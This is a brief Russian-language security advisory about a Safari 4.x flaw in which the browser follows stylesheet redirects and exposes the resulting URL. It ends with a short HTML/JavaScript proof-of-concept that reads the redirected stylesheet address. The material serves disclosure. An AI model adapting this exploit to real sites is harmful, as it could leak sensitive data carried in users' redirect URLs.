Программа: Apple Safari 4.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за того, что приложение следует перенаправлению стилей страниц и позволяет
прочитать целевой URL. Атакующий может использовать сайты, использующие
перенаправления в URL содержащие конфиденциальную информацию, что позволит
получить доступ к этим данным.

Эксплоит:

<link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>



Оставить мнение